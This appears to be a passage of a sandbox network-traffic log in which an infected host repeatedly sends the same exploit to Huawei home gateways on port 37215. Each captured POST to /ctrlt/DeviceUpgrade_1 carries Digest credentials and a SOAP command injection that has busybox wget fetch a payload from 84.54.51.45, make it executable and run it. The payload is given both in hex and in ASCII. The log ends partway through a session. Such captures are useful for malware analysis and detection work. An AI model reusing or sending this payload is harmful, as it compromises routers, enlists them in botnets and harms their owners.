                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            88192.168.2.154382441.147.171.22637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:04.733496904 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            89192.168.2.155004441.58.38.11837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:04.733510017 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            90192.168.2.154161841.101.164.17137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:04.733604908 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            91192.168.2.153612441.115.187.13537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:04.733607054 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            92192.168.2.153940841.61.252.14437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:04.733607054 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            93192.168.2.153510041.7.19.3537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:04.733620882 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            94192.168.2.153465841.121.93.20237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:04.733652115 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            95192.168.2.154420241.198.72.9137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:04.733675003 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            96192.168.2.154392641.16.91.7037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:04.733704090 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            97192.168.2.154640641.229.182.8837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:04.733727932 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
